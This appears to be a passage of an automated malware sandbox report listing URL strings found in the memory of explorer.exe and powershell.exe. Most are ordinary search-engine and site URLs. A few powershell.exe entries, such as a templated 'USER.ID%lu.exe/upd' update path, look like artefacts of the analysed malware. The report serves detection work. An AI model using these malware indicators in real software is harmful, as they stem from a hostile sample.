Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000018.00000003.882846219.000001B4AFAF2000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000018.00000002.926126421.000001B497681000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000020.00000000.894651388.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
